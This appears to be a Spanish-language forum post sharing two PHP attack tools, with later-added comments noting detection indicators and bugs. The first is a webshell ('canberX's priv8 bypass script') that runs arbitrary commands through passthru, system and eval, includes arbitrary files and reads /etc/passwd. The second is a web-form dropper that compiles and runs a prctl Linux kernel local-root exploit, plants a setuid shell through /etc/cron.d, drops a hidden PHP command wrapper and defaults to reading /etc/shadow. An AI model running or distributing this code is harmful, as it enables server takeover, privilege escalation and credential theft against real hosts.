Aquí os dejo una con bypass:
<?php
// Webshell bootstrap: suppress all error output, lift execution-time limits,
// collect host facts for the status panel, and read every control parameter
// straight from the query string with no validation.
error_reporting(0);
set_magic_quotes_runtime(0); // removed in PHP 7.0 -- a hint to the sample's age
@set_time_limit(0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
// Host facts echoed later: server IP, disable_functions list, cwd, free/total disk, server software.
$addr=$_SERVER['SERVER_ADDR'];
$disable_func=@ini_get('disable_functions');
$current=@getcwd();
$freedisk=@diskfreespace($current);
$server_sys=getenv('SERVER_SOFTWARE');
$totaldisk=@disk_total_space($current);
// Fixed banner; also a convenient static content signature for this sample.
$title="canberX's priv8 bypass script | coded for ir4dex";
// Attacker-controlled GET parameters. The parameter names themselves
// (bypass1..bypass6, sdir, phpinfo, bypass_mode, cmd, cdir, crdir) are a
// usable access-log / WAF indicator for this family. $bypass_mode is read
// but never consulted anywhere below.
$bypass1=$_GET["bypass1"];
$bypass2=$_GET["bypass2"];
$bypass3=$_GET["bypass3"];
$bypass4=$_GET["bypass4"];
$bypass5=$_GET["bypass5"];
$bypass6=$_GET["bypass6"];
$sdir=$_GET["sdir"];
$phpinf=$_GET["phpinfo"];
$bypass_mode=$_GET["bypass_mode"];
$cmd=$_GET["cmd"];
$cdir=$_GET["cdir"];
$crdir=$_GET["crdir"];
// Pre-4.1 compatibility: alias the superglobals to the old HTTP_*_VARS arrays.
// This runs after the $_GET reads above, so it only affects code that follows.
if(version_compare(phpversion(), '4.1.0') == -1)
{
$_POST = &$HTTP_POST_VARS; // thanx Rush Security Team's r57 Shell for this function %)
$_GET = &$HTTP_GET_VARS;
}
// Print the identity the PHP process runs as. With the posix extension the
// effective uid/gid are resolved to names; otherwise get_current_user()/
// getmyuid()/getmygid() are used and uid 0 / gid 0 is highlighted as root.
// Writes HTML directly; returns nothing.
function user_sys(){
if(function_exists('posix_geteuid') && function_exists('posix_getegid') && function_exists('posix_getgrgid') && function_exists('posix_getpwuid'))
{
$usrinf=@posix_getpwuid(@posix_geteuid());
$grpinf=@posix_getgrgid(@posix_getegid());
echo 'uid='.$usrinf['uid'].' ('.$usrinf['name'].') gid='.$grpinf['gid'].' ('.$grpinf['name'].')';
}
else
{echo "user=".strtolower(@get_current_user())." uid=".@getmyuid()." gid=".@getmygid();
// Loose comparison: getmyuid()/getmygid() return false on failure and
// false == "0" holds in PHP, so a failed lookup is also reported as root.
if(@getmyuid()=="0" && @getmygid()=="0")
{echo "<font color='green'> - y0u are <b>r00t</b></font>";}
}
}
// Print whether PHP's safe_mode is enabled (green "ON" / red "OFF"). safe_mode
// was removed in PHP 5.4, so on any current interpreter this always reports OFF.
// The bypass* functions further down exist to work around that setting when on.
// Writes HTML directly; returns nothing.
function safemode_test()
{
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{echo "<font color=\"green\"><b>ON :(</b></font>";}
else
{echo "<font color=\"red\"><b>OFF :)</b></font>";}
}
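// Render a numeric file mode (as returned by fileperms()) as the ten-character
// "ls -l" style string, e.g. 0100644 -> "-rw-r--r--", 040755 -> "drwxr-xr-x".
// $mode: integer st_mode bits; a false/0 value yields "u---------".
// Returns the type character followed by the nine owner/group/world permission
// characters, with setuid/setgid/sticky shown as s/S/t/T in the execute columns.
function perms($mode)
{
// The file type occupies the top four bits and has to be compared as a whole.
// Testing individual bits (0x2000, 0x4000, ...) misclassifies symlinks (0xA000),
// sockets (0xC000) and block devices (0x6000), because those values share bits
// with the character-device and directory codes.
switch ($mode & 0xF000)
{
case 0x1000: $type='p'; break; // FIFO
case 0x2000: $type='c'; break; // character device
case 0x4000: $type='d'; break; // directory
case 0x6000: $type='b'; break; // block device
case 0x8000: $type='-'; break; // regular file
case 0xA000: $type='l'; break; // symbolic link
case 0xC000: $type='s'; break; // socket
default:     $type='u'; break; // unknown / unreadable
}
// (bit, letter) pairs for owner, group and world, in output order.
$bits = array(
array(00400, 'r'), array(00200, 'w'), array(00100, 'x'),
array(00040, 'r'), array(00020, 'w'), array(00010, 'x'),
array(00004, 'r'), array(00002, 'w'), array(00001, 'x'),
);
$s = $type;
foreach ($bits as $bit)
{
$s .= ($mode & $bit[0]) ? $bit[1] : '-';
}
// Special bits replace the execute column of their class: lowercase when the
// execute bit is also set, uppercase when it is not (same convention as ls).
if( $mode & 0x800 ) { $s[3] = ($s[3]=='x') ? 's' : 'S'; }
if( $mode & 0x400 ) { $s[6] = ($s[6]=='x') ? 's' : 'S'; }
if( $mode & 0x200 ) { $s[9] = ($s[9]=='x') ? 't' : 'T'; }
return $s;
}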
// Format a byte count as a human-readable size, rounded to two decimals
// (e.g. 1536 -> "1.5 KB"); values below 1024 are returned as "<n> B".
// Only defined when no previously loaded code already declared view_size().
if (!@function_exists("view_size"))
{
function view_size($size)
{
// Thresholds in descending order, each paired with its unit suffix.
$units = array(
1073741824 => " GB",
1048576    => " MB",
1024       => " KB",
);
foreach ($units as $divisor => $suffix)
{
if ($size >= $divisor)
{
// round to hundredths of the unit (two decimals at most)
return @round($size / $divisor * 100) / 100 . $suffix;
}
}
return $size . " B";
}
}
// Fallback line for a directory entry whose perms() string was falsy. As written
// the function is not usable: $dosya and $dir are neither parameters nor declared
// global, so the is_*() checks run on an undefined (empty) path and the line is
// appended to a local array that is discarded on return. scanned_dir() never
// actually reaches this call because perms() always returns a non-empty string.
function wndir()
{
if(is_dir($dosya))
{
$dmod="d";
} else {$dmod="-";}
if(is_writable($dosya))
{
$wmod="w";
} else {$wmod="-";}
if(is_readable($dosya))
{
$rmod="r";
} else {$rmod="-";}
if(is_executable($dosya))
{
$emod="x";
} else {$emod="-";}
$dir[]="$dmod"."$rmod"."$wmod"."$emod"."$rmod"."$wmod"."$emod"." $dosya";
}
// Directory listing for the page's textarea: each entry of $gel ("." when empty)
// is echoed as "<perms> <name>" on its own line. fileperms() is called on the bare
// entry name, so it resolves against the script's cwd rather than $gel. The
// wndir() branch is dead because perms() never returns a falsy value. opendir()
// and readdir() failures are @-suppressed, in which case nothing is listed.
function scanned_dir($gel){
if(empty($gel))
{$gel=".";}
$git=@opendir($gel);
while($dosya=@readdir($git))
{
if(perms(@fileperms($dosya)))
{$dir[]=perms(@fileperms($dosya))." $dosya";}
else
{wndir();}
}
foreach ($dir as $list)
{echo "$list\n";}
@closedir($git);
}
// Command execution: hands the attacker-supplied $cmd to the first executor found,
// trying passthru, system, system_exec, shell_exec, exec and finally eval. Only
// the passthru()/system() branches write output to the page; shell_exec()/exec()
// return it and the value is discarded. Returns $cmd unchanged.
// Defender notes: this probe-and-fall-back chain is a recurring webshell
// signature; the same function names are what disable_functions needs to cover
// (the page prints that setting in its status panel), and shell processes spawned
// by the web-server user are the host-side indicator to monitor.
function cmd_test($cmd)
{
if(function_exists("passthru"))
{passthru($cmd);}
elseif(function_exists("system"))
{@system($cmd);}
elseif(function_exists("system_exec"))
{@system_exec($cmd);}
elseif(function_exists("shell_exec"))
{@shell_exec($cmd);}
elseif(function_exists("exec"))
{@exec($cmd);}
elseif(function_exists("eval"))
{eval($cmd);}
return $cmd;
}
// Bypass Functions - priv8 priv8 priv8
// "file bypass with include": include() of an attacker-supplied path. Any PHP in
// the target file is executed and everything else is echoed, so this is both a
// file-read and a code-execution primitive (local file inclusion).
function bypass1($gel1)
{include ("$gel1");}
// "file bypass with require": same as bypass1() but via require(), which aborts
// the whole script with a fatal error when the path cannot be read.
function bypass2($gel1)
{require ("$gel1");}
// "file bypass with imap_body": opens the attacker-supplied path as a local
// mailbox with empty credentials and prints the body of "message" 1, i.e. reads a
// file through the IMAP extension instead of the filesystem functions that
// safe_mode restricts. Every call is @-suppressed, so an unreadable path prints nothing.
function bypass3($gel1)
{
$cmdz=@imap_open($gel1, "", "");
$pwr=@imap_body($cmdz, 1);
echo $pwr;
@imap_close($cmdz);
}
// "dir bypass with imap_list": opens /etc/passwd only to obtain a mailbox handle,
// then calls imap_list() with the given path as reference and "*" as pattern to
// enumerate directory entries through the IMAP extension, one per line.
// count() on a false result (listing failed) simply yields an empty loop.
function bypass4($gel1)
{
$cmdz=@imap_open('/etc/passwd', "", "");
$dirl=@imap_list($cmdz,trim($gel1),"*");
for ($i = 0; $i<count($dirl);$i++)
echo $dirl[$i]."\r\n";
@imap_close($cmdz);
}
// "dir bypass with opendir": plain opendir()/readdir() listing of the given
// directory, every entry on its own line with no filtering of "." and "..".
// $dir is a local that is never initialised, so when readdir() yields nothing the
// foreach runs over an undefined variable (the warning is silenced by error_reporting(0)).
function bypass5($gel1)
{
$git=@opendir($gel1);
while($dosya=@readdir($git))
{$dir[]=$dosya;}
foreach ($dir as $list)
{echo "$list\n";}
@closedir($git);
}
// "/etc/passwd bypass with fopen": opens the given path and prints only its first
// line (at most 1023 bytes, one fgets() call). The form pre-fills /etc/passwd.
// fclose() is not guarded against a failed open.
function bypass6($gel1)
{
$git=@fopen("$gel1","r");
$users_etc=fgets($git,1024);
echo "$users_etc\n";
fclose($git);
}
/* Pages */
// Page rendering. "?phpinfo=..." short-circuits to a phpinfo() dump and exits.
if(!empty($phpinf))
{echo "<center><b>PHP INFO:</b><br>";phpinfo();die("[<a href='".$_SERVER['PHP_SELF']."'>back</a>]</center>");}
/* Face of the ir4dex web shell */
// Banner. These strings are static and make good content signatures for the sample.
echo "<html><head></head><title>$title</title><body>";
echo "<h3>$title</h3>\n";
echo "priv8 - priv8 - priv8 !<br>\ncoded by canberX for <b>IR4DEX</b><br>\n";
echo "<small>brazillian h4x0r's ruLz</small><br>\n";
echo "/s irc.gigachat.net #ir4dex<br><br>\n";
echo "<hr>\n";
// Status panel built from the values collected at the top of the file.
echo "<h4>Server Infos:</h4>";
echo "<b>safe mode: </b>";
safemode_test();
echo "<br>\n";
echo "<b>server uname: </b>".php_uname()."<br>\n";
echo "<b>user: </b> ";
user_sys();
echo "<br>\n";
echo "<b>currentdir: </b> $current<br>\n";
echo "<b>freespace: </b>".view_size($freedisk)."<br>\n";
echo "<b>totalspace: </b>".view_size($totaldisk)."<br>\n";
echo "<b>server system: </b>$server_sys<br>\n";
echo "<b>disabled funcs: </b>$disable_func<br>\n";
echo "<b>server addr: </b>$addr<br>\n";
echo "<b>y0u are: </b>".$_SERVER['PHP_SELF']."<br>\n";
echo "<b>eval menu:</b>";
echo "- [<a href='".$_SERVER['PHP_SELF']."?phpinfo=true' title='phpinfo();'>phpinfo</a>] -\n";
echo "[<a href='".$_SERVER['PHP_SELF']."?bypass_mode=true' title='safe mode bypass section &)'>bypass</a>] -<br><br>\n";
// Input forms. Every field is submitted back via GET and read unvalidated at the
// top of the file, so the parameters show up verbatim in the web server's access log.
echo "<form method='GET'><b>my code:</b><br><input type='text' size='80' name='cmd'></form>\n";
echo "<form method='GET'><b>w0rk here:</b><br><input type='text' size='80' name='cdir' value='".$cdir."'></form>\n";
echo "<form method='GET'><b>create dir:</b><br><input type='text' size='80' name='crdir' value='dir name'></form><br>\n";
echo "<hr><br>\n";
// Listing of the working directory. Both branches call scanned_dir($cdir); the
// empty case relies on scanned_dir() substituting "." itself.
echo "<textarea rows='10' cols='120'>\n";
if(!empty($cdir))
{scanned_dir($cdir);}
else
{scanned_dir($cdir);}
echo "</textarea>\n";
// Action dispatch: each non-empty parameter triggers its handler in turn.
// cmd goes to cmd_test() for execution and crdir is passed to mkdir() as-is.
echo "<textarea rows='10' cols='120'>\n";
if(!empty($sdir))
{scanned_dir($sdir);}
if(!empty($cmd))
{cmd_test($cmd);}
if(!empty($crdir))
{mkdir($crdir);}
if(!empty($bypass1))
{bypass1($bypass1);}
if(!empty($bypass2))
{bypass2($bypass2);}
if(!empty($bypass3))
{bypass3($bypass3);}
if(!empty($bypass4))
{bypass4($bypass4);}
if(!empty($bypass5))
{bypass5($bypass5);}
if(!empty($bypass6))
{bypass6($bypass6);}
echo "</textarea>\n";
// Quick probes for writable index files (relative to the cwd) and for /etc/passwd access.
echo "<br><br><b>Extra Funcs:</b><br>\n<textarea rows='6' name='extf' cols='120' readonly='true'>\n";
if(is_file("config.php")){echo "site have config.php\n";} else {echo "site haven't got config.php\n";}
if(is_writable("index.php")){echo "index.php will writable\n";}else {echo "index.php won't writable\n";}
if(is_writable("index.html")){echo "index.html will writable\n";}else {echo "index.html won't writable\n";}
if(is_writable("index.htm")){echo "index.htm will writable\n";}else {echo "index.htm won't writable\n";}
if(is_readable("/etc/passwd")){echo "/etc/pass will readable\n";}else {echo "you can not read the /etc/passwd\n";}
if(is_writable("/etc/passwd")){echo "/etc/pass will writable\n";}else {echo "you can not write the /etc/passwd\n";}
echo "</textarea>\n";
echo "<br><hr><br>\n";
// Bypass forms; the current sdir value is carried over as the default path for each.
echo "<form method='GET'><b>file bypass with include:</b> <input type='text' size='80' name='bypass1' value='".$sdir."'></form>\n";
echo "<form method='GET'><b>file bypass with require:</b> <input type='text' size='80' name='bypass2' value='".$sdir."'></form>\n";
echo "<form method='GET'><b>file bypass with imap_body:</b> <input type='text' size='80' name='bypass3' value='".$sdir."'></form>\n";
echo "<form method='GET'><b>/etc/passwd bypass with fopen:</b> <input type='text' size='80' name='bypass6' value='/etc/passwd'></form>\n";
echo "<form method='GET'><b>dir bypass with imap_list:</b> <input type='text' size='80' name='bypass4' value='".$sdir."'></form>\n";
echo "<form method='GET'><b>dir bypass with opendir:</b> <input type='text' size='80' name='bypass5' value='".$sdir."'></form>\n";
echo "<hr><small><b>$title</b></small>";
?>
Y otra:
<?php
/*
#######################################
# #
# PRIVATE! PRIVATE! PRIVATE! #
# #
# XOR CREW #
# #
# #
#######################################
*/
// Local privilege-escalation dropper wrapped in a web form. On a POST carrying
// exploit_it it writes /tmp/a.sh, which unpacks two C sources (/tmp/getsuid.c and
// /tmp/s.c), compiles them with the compiler path the form detected, runs them,
// and also drops a PHP command wrapper at the POSTed 'php' path. Without that
// POST it renders the form and runs the compiler and exec-permission probes.
// Host artifacts named in this file, useful for forensics and detection:
// /tmp/a.sh, /tmp/getsuid*, /tmp/s, /tmp/s.c, /tmp/test.sh, /etc/cron.d/core,
// and the dropped files, which default to <cwd>/.ash, <cwd>/.zsh and <cwd>/.shell.php.
set_time_limit(0);
if(isset($_POST['exploit_it'])) {
// Only attempted on a 2.6-series Linux kernel; the technique targets a long-patched kernel bug.
if(stristr(php_uname(),"2.6.") && stristr(php_uname(),"Linux")) {
if($_POST['compiler'] == "none") {
echo '<div align="center"><h4>No compiler found! Can not continue.</h4></div>';
// "end" is not a PHP statement. On PHP 7 and earlier it is an undefined-constant
// no-op and execution continues with $cc == "none"; PHP 8 throws an Error here.
end;
}
$cc = $_POST['compiler'];
// Shell script written to /tmp/a.sh. Everything up to the closing quote after the
// second "__EOF__" is one single-quoted PHP literal, so `$_POST[cmd]` on the
// system() line below is NOT interpolated by PHP: it reaches the unquoted shell
// heredoc as literal text and is expanded there as a shell variable instead.
// Only the POSTed 'shell' value and $_ENV["TMPDIR"] are actually spliced in.
$prctl = '#!/bin/sh
cat > /tmp/getsuid.c << __EOF__
#include <stdio.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <unistd.h>
#include <linux/prctl.h>
#include <stdlib.h>
#include <sys/types.h>
#include <signal.h>
char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root chown root.root /tmp/s ; chmod 4777 /tmp/s ; rm -f /etc/cron.d/core\n";
int main() {
int child;
struct rlimit corelimit;
corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, &corelimit);
if ( !( child = fork() )) {
chdir("/etc/cron.d");
prctl(PR_SET_DUMPABLE, 2);
sleep(200);
exit(1);
}
kill(child, SIGSEGV);
sleep(120);
}
__EOF__
cat > /tmp/s.c << __EOF__
#include<stdio.h>
main(void)
{
setgid(0);
setuid(0);
if (getuid() == 0) {
printf("\n
* We have root!\n\n" );
system("/bin/sh");
system("$_POST[cmd]");
';
// Only copy a shell into place if the form actually located /bin/ash or /bin/zsh.
if(!stristr($_POST['shell'],"could not be found")) {
$prctl .= 'system("cp /bin/ash '.$_POST['shell'].'");';
}
// Remainder of /tmp/s.c: on success /tmp/s deletes itself and the cron.d core files.
$prctl .= 'system("rm -rf /tmp/s");
system("rm -rf /etc/cron.d/core*");
system("exit");
} else {
printf("\n[-] Failed.\n\n" );
system("rm -rf '.$_ENV["TMPDIR"].'/s");
}
return 0;
}
__EOF__
';
// PHP wrapper dropped at $_POST['php']: runs a GET-supplied command through the
// copied shell. NOTE(review): the concatenation on the passthru line looks
// syntactically malformed (`. -c "..."`), so as pasted this file may not parse at all.
$phpwrapper = '<?php
if(isset($_GET[cmd])) {
echo "<pre>";
echo passthru("'.$_POST['shell']. -c "$_GET[cmd]\"");
echo "</pre>";
}
?>';
echo "<pre><div align='center'>";
// Stage the build script and the PHP wrapper on disk.
$h = fopen("/tmp/a.sh", "w");
fwrite($h,$prctl);
fclose($h);
$handle = fopen($_POST['php'], "w");
fwrite($handle, $phpwrapper);
fclose($handle);
// Build and run; command output is streamed straight into the page.
echo "Building exploit....<br />";
echo passthru("sh /tmp/a.sh");
echo passthru("$cc -o /tmp/s /tmp/s.c");
echo passthru("$cc -o /tmp/getsuid /tmp/getsuid.c");
echo "Running exploit...waiting about 4 minutes to see if exploit worked<br />";
echo passthru("/tmp/getsuid");
echo passthru("/tmp/s");
// Cleanup removes the helpers only; /tmp/s is removed by the C program itself on
// success, and the copied shell and the PHP wrapper are left behind.
echo "Cleaning up<br />";
echo passthru("rm -rf /tmp/getsuid*");
echo passthru("rm -rf /tmp/s.c");
echo passthru("rm -rf /tmp/a.sh");
echo "Done!<br />
</div>
</pre>";
} else {
echo "Kernel version IS NOT 2.6.x or is a version known to not work: ".php_uname();
}
} else {
?>
<div align="center">
<h4>PHP Attack Script</h4>
<h5><?php echo php_uname(); ?></h5>
<pre><div align="center">
Checking for temp Directory.........<?php echo $_ENV["TMPDIR"]."\n"; ?>
Checking for cc or gcc............<?php
// Walk $PATH for cc, then gcc; the first hit is stored for the hidden 'compiler' field.
$path = explode(":",$_ENV["PATH"]);
$gotcc = FALSE;
$gotgcc = FALSE;
foreach($path as $dir) {
if(is_file($dir."/cc") && $gotgcc == FALSE && $gotcc == FALSE) {
$gotcc = TRUE;
$pathtocc = $dir."/cc";
echo '[ <font color="#00CC00">OK</font> ]'."\n";
break;
} elseif($gotcc == FALSE && $gotgcc == FALSE && is_file($dir."/gcc")) {
$gotgcc = TRUE;
$pathtogcc = $dir."/gcc";
echo '[ <font color="#00CC00">OK</font> ]'."\n";
break;
}
}
if($gotcc == FALSE && $gotgcc == FALSE) {
echo '[ <font color="#FF0000">Failed</font> ]'."\n";
}
?>
Checking for execute permissions..<?php
// Exec-permission probe: writes /tmp/test.sh, runs it via system(), then deletes
// it -- a short-lived /tmp artifact that file-integrity or /tmp monitoring can catch.
$h = fopen("/tmp/test.sh","w");
fwrite($h,"#!/bin/sh");
fclose($h);
system("sh /tmp/test.sh",$returnval);
if($returnval == 0) {
echo '[ <font color="#00CC00">OK</font> ]'."\n";
} else {
echo '[ <font color="#FF0000">Failed</font> ]'."\n";
}
passthru("rm -rf /tmp/test.sh");
?>
</pre></div><br />
<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
<table border="0" cellspacing="0">
<tr>
<td><div align="right">Exploit:</div></td>
<td>
<select name="exploit">
<option selected="selected">Prctl 2.6.x exploit</option>
</select>
</td>
</tr>
<tr>
<td><div align="right">Location and name for root shell:</div></td>
<td><input type="text" name="shell" size="50" value="<?php if(file_exists("/bin/ash")) { echo getcwd()."/.ash"; } elseif(file_exists("/bin/zsh")) { echo getcwd()."/.zsh"; } else { echo "/bin/ash or /bin/zsh could not be found!"; } ?>"/></td>
</tr>
<tr>
<td><div align="right">Location and name for php shell wrapper: </div></td>
<td><input type="text" name="php" size="50" value="<?php echo getcwd()."/.shell.php" ?>" /></td>
</tr>
<tr>
<td><div align="right">Commands to perform while root <br />seperate multiple commands with ; : </div></td>
<td><input type="text" name="cmd" size="50" value="cat /etc/shadow" /></td>
</tr>
</table>
</div>
<div align="center">
<input type="hidden" name="compiler" value="<?php
// Hidden field carrying the compiler path detected above, or 'none'.
if(isset($pathtocc)) {
echo $pathtocc;
} elseif(isset($pathtogcc)) {
echo $pathtogcc;
} else {
echo 'none';
}
?>" />
<input type="hidden" name="exploit_it" value="doit" />
<input name="submit" type="submit" value="Submit" /><br />
After pressing submit it may take up to 4 minutes for the page to load depending
on exploit. <br />
This is due to the exploit being run.<br />
If exploit fails the system may be patched or kernel may not be vuln.
</div>
</form>
<?php } ?>